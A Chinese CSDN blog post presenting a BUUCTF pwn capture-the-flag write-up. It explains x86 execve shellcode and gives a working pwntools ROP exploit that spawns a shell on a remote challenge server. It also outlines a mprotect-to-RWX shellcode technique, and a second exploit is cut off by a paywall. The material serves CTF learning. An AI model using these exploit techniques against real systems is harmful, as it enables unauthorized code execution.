BUUCTF_WriteUp 2021-08-23

最新推荐文章于 2024-04-10 19:25:41 发布
最新推荐文章于 2024-04-10 19:25:41 发布
阅读量355 收藏
点赞数 1
分类专栏: Pwn 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56897090/article/details/119874866
版权

2021-08-23

文章目录


做了11道题
整体分析:大多是基础题

shell_asm

题目描述

other_shellcode

题目分析

看main函数、整体程序逻辑↓
![[Pasted image 20210823162439.png]]![[Pasted image 20210823162447.png]]

直接nc连上去,就getShell了。
我猜:这题主要是想告诉我们x86下的shellcode汇编是怎样的

sys_execve的系统调用方式:
![[Pasted image 20210823163019.png]]

看一下汇编代码:
![[Pasted image 20210823163223.png]]

主要逻辑

  1. 将file参数赋值/bin/sh(主要是这个,相当于用root执行了命令)
  2. argv、env都是0

int 0x80、上面的就相当于调用了sys_execve("/bin/sh",0,0)

x86与x64的区别

系统 汇编
x86 int 0x80
x64 syscall

这是libc.so(64位)调用execve在ida的反汇编
![[Pasted image 20210823163717.png]]

参考链接:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

BabyROP

题目描述

[HarekazeCTF2019]baby_rop

解题思路

0x01 整体思路
  1. 同jarvisoj_level2
  2. 找binsh字符串的地址,x64系统下,调用函数的第一个参数需要修改rdi,所以用ROPgadget找pop rdi的代码
  3. 找到callee调用system的地址
0x02 额外前置知识:

利用ROPgadget查找pop_rdi
ROPgadget --binary 文件 --only 'pop|ret' | grep 'rdi'
说明:grep用作筛选寄存器为rdi的gadget

Linux搜索全局文件名
$ find / -name flag (找文件名为flag的)
发现getshell后直接cat flag没有这个文件,所以用了命令查找到flag在其他文件夹

0x03 exp
#coding=utf-8
from pwn import *

context.log_level="debug"


isLocal=0


if  isLocal:
    p=process("/root/babyrop")#

    pause()
else :
    p=remote("node4.buuoj.cn",25405)

binsh_addr=0x0000000000601048
system_callee_addr=0x00000000004005E3
pop_rdi_binsh_addr=0x0000000000400683 #: pop rdi ; ret

#64 bit need rdi
p.sendlineafter(b"name?",b"a"*0x10+p64(0)+p64(pop_rdi_binsh_addr)+p64(binsh_addr)+p64(system_callee_addr))
p.interactive()

not_the_same_3dsctf_2016

0x01 解题思路

看了Exp研究了之后,大概的思路是这样的:

  1. 基础是栈溢出实现ROP,返回到任意地址
  2. 但是程序没有后门地址,也没有GOT可改写利用的代码,同时NX保护也是开启的(不可任意执行shellcode)怎么办呢??
    1. 程序是静态链接编译的文件,栈溢出后,可调用系统的mprotect函数,修改got表权限
    2. mprotect修改内存空间的权限,RWX,写入shellcode
      1. 因为mprotect需要3个参数,用ROPgadget找3个参数的gadget
      2. 第一个参数为修改内存空间的开始地址(**GLOBAL_OFFSET_TABLE**开始地址)
      3. 第二个参数要赋予权限的空间长度(开始地址~开始地址+长度)
      4. 第三个参数是赋予的权限(Linux中7是指可执行的权限)
    3. 开了任意执行的空间,写入shellcode,利用系统的read
      1. 第一个参数fd文件号(0为输入流、1为输出流)=>(exp代表先压栈buf内容,再读入输入内容)
      2. 第二参数buf,写入的数据
      3. 第三个参数len,写入的长度

附上mprotect、read系统调用表
![[Pasted image 20210823164752.png]]![[Pasted image 20210823165307.png]]

参考链接:http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

0x02 exp

from pwn import *;
context.log_level="debug"
context.arch="i386"
context.os="linux"

isLocal=1


if  isLocal:
    p=process("/root/not_the_same_3dsctf_2016")#

    pause()
else :
    p=remote("node4.buuoj.cn"
最低0.47元/天 解锁文章
Ch1lkat
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其中涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
BUUCTF笔记之Misc系列部分WriteUp(一)
克格莫
05-24 2402
话说misc系列可以说是调剂放松了,web和crypto做吐了,就来做点简单的misc放松一下。 1.N种方法解决 乍一看以为真是个exe,我还拖进IDA看了一波,结果还是吃了没见识的亏,后来IDA无果,拖进winhex看发现是一个图片文件。。。 重命名为jpg打开无果,发现文件头后面有个base64,看看文件末尾有等于号,那把中间这一大坨拿出来解码试试: 解码出来提示是png了,那把它解码之后的数据转成图片: 扫码得到flag。 ...
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 920
1、[极客大挑战 2019]EasySQL
【BUUCTF Web】WriteUp超详细(1),2024年最新最详细的解释小白也能听懂
最新发布
2401_84248479的博客
04-10 867
首先第一步 判断是哪一种注入方式:字符型?还是数字型?在请求框中输入 1 1’ 来根据服务器给出的回显进行判断输入1时 输入1’ 时 根据回显内容可知,该注入类型为字符型注入接下来因为是字符型注入,可以尝试字符型注入时的万能公式试一试 这里我个人认为区分字符型和数字型的最简单的方式就是看他1后面有没有跟着单引号,如果有就是字符型,如果没有就是数字型万能公式: 1 and 1=1 数字型 1’ and ‘1’=‘1 字符型 1 or 1=1 数字型 1’ or ‘1’='1 字符型使用
BUUCTF的wireshark流量分析题目writeup汇总
qq_49849300的博客
09-06 2700
1.Transfer-Encoding: chunked分块编码。筛选 URB_INTERRUPT in 的HID Data数据。2./9j是jpg文件头的base64编码。这中间一顿爆破爆不出来,还是得找流量。要密码,爆破试一下 5790。说明下载的是6666.jpg。
BugKuCTF-杂项-writeup 大全?
热门推荐
疯狂棒棒糖的博客
06-20 1万+
最近玩了一个 CTF 的练习平台-----BugkuCTF下面会把一些题目的方法记录下来先讲一下杂项1.签到题只要关注公众号就可以得到 flag---开胃菜2.这是一张单纯的图片网站上打开是无法加载,将图片保存到本地是个小兔子,然后用编辑器打开图片,发现了最下面一行的 unicode 编码,解密就有 flag...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
BUUCTF笔记之Crypto部分WriteUp(二)
克格莫
05-17 2313
1、凯撒?替换?呵呵! 凯撒密码一般就是26个字母经过单纯的按字母顺序来位移的加密方法(一般) 如:abc=def 进阶版的凯撒就不按照字母顺序的加密,等于是一个字母打乱顺序,使用类似密码本的形式对应另一个字母。 所以就要经过暴力破解出每一种可能的对应加密。 这里使用工具: https://quipqiup.com/ 我自己打算给出一个脚本,在本地爆破 ...
BUUCTF Crypto RSA & what writeup
Slightwind's Blog
04-18 3310
RSA & what RSA共模攻击 + Base64隐写 在 buu 刷到的一题,看到 N 用了两次,但 RSA 共模攻击解完发现还没结束… from Crypto.Util.number import* import base64 def egcd(a, b): if a == 0: return (b, 0, 1) else: g, ...
BUUCTF笔记之Crypto部分WriteUp(一)
克格莫
05-08 1326
1、RSA1 直接上代码: import gmpy2 as gp p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 12640674973996472769176047937170883420927050821480010581
Bugku-加密-rsa(WriteUp)
shenzhang7331的博客
11-20 8104
该题目是一道rsa解密的题目 ne已经给出,可以看出e特别大,在e特别大的情况下,可以使用wiener attack的方法进行破解,正好工具RsaCtfTool集成了wiener attack的方法,所以可以直接使用RsaCtfTool计算私钥, 如下所示: 使用pqe直接解密密文,得到flag,代码如下所示: #coding:utf-8 from libnum import n2s,s2n im...
Bugku CTF 加密writeup (未完待续)
KRDecad3的博客
05-18 3175
Bugku CTF 加密writeup (未完待续) 本人CTF小白一枚,此wp是参考网上大佬的wp再加上自己操作写出来的,如有纰漏,还请指正。 0x01滴答~滴 从提供的密码可以猜测是摩尔斯密码,利用bugku自带的解码工具进行解码, space为空格,short为“.”,long为“-”,得到flag。 0x02聪明的小羊 提示中有“栅栏”,则猜测为栅栏密码,并且栏数为2,...
BUUCTF——rsa系列(4)
Luiino的博客
07-27 4036
给了c、z、n以及e分析一下,首先是它的作用是进行求导,前一个参数表示求导的内容,后一个参数表示求导的主体,如意思是以p为主体对求导得到1/(1+),同理得到1/(1-)。其次对于如Fraction(1,Derivative(arctan(p),p))是以1为分子,以Derivative(arctan(p),p)为分母,这样一来可以得到关系式z=可以进一步得到下面的关系式=z-2n,=z+2n,敲代码解出p、q。............
RSA:由p,q,dp,dq,c求明文的算法
qi_SJQ_的博客
12-16 2002
1.例题:【BUUCTF】RSA1 2. python解密: import gmpy2 I = gmpy2.invert(q,p) mp = pow(c,dp,p) mq = pow(c,dq,q) #求幂取模运算 m = (((mp-mq)*I)%p)*q+mq #求明文公式 print(hex(m)) #转为十六进制 3.数学原理分析: 转载:https://blog.csdn.net/MikeCoke/article/deta
BugkuCTF-练习题_逆向_入门逆向writeup
PannnJq的博客
08-29 720
writeup 题目: baby.zip Step1 下载这个压缩包,解压后为baby.exe文件,放入exeinfo中查看信息。 Step2 在IDA中打开baby.exe Step3 找到main函数使用F5键转换,没发现任何信息,view-string查看字符串也没有信息。 Step4 看到一连串ptr+数字,使用R键将其转化后发现flag flag: flag{Re_1s_S0_...
crypto-baby_writeup(buuctf)
耐酸碱高温固化材料近距离传输研究
12-27 335
大概审计了一下enc函数,能看出来是将用户输入字符串每4个字节进行处理,生成3个字节,那么用户输入16个字节最后会加密成12个字节,与data区601100的数据进行比对,比对成功后即输出flag。将原来的比对逻辑改了一下,原来是加密后字节与601100部分比对,比对不成功则退出,改成比对成功则退出,那么现在就可以构造特殊的payload来枚举flag了。elf打补丁教程可以参考。题目提供了一个elf可执行文件,叫做baby_wp。逆向加解密,记录一下。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值